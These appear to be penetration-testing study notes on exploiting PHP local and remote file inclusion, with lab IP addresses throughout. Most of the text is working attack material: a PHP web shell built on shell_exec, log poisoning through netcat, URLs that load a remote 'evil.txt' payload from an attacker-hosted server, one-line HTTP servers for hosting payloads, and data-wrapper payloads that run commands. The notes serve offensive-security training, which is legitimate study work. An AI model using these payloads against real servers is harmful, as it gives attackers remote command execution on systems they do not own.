File Inclusion Vulnerabilities

• This vuln allows an attacker to include the contents of a file in the webpage
• To exploit, we need to be able to execute code and write our shell code somewhere (local or remote)
• Also the language used makes a considerable difference when crafting the payload

Identifying File Inclusion Vulnerabilities

• Exactly the same as with Directory Traversal Vulnerabilities, but we also need to the contents of the file to be executed, not just displayed.

Exploiting Local File Inclusion (LFI)

• If the source PHP contains something similar to: <?php include $_GET["file"]; ?>
• We probably can't upload a file directly to the server, but if we can we can include our payload there and reference it in the file query string to achieve a LFI

Contaminating Log Files

• We can try to inject code by poisoning the log files
  • nc -nv 10.11.0.22 80
    • <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
      • <php ;?>: Everything is written in PHP (the servers language)
      • <pre></pre>: To preserve everything, even line breaks
      • shell_exec($_GET['cmd']): Execute any command received via the cmd query string in a shell

LFI Code Execution

• http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Remote File Inclusion (RFI)

• Less common, because the server must allow loading files for remote locations, but its much easier to exploit
• echo "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>" > /vat/www/html/evil.txt
• Start our apache server: sudo systemctl start apache2
• http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig
• This is a Web Shell!
  • Web Shells for common languages can be found at /usr/share/webshells

Expanding Your Repertoire

• Alternatives to apache (Host any files in the current working path on an arbitrary port)
  • python -m SimpleHTTPServer 7721
  • python3 -m http.server 7331
  • php -S 0.0.0.0:8000
  • ruby -run -e httpd . -p 9000
  • busybox httpd -f -p 10000

PHP Wrappers

• Data wrapper allows exploiting a LFI without any local files
  • http://10.11.0.22/menu.php?file=data:text/plain,hello world
    • data type, data contents
  • http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Relevant Note(s):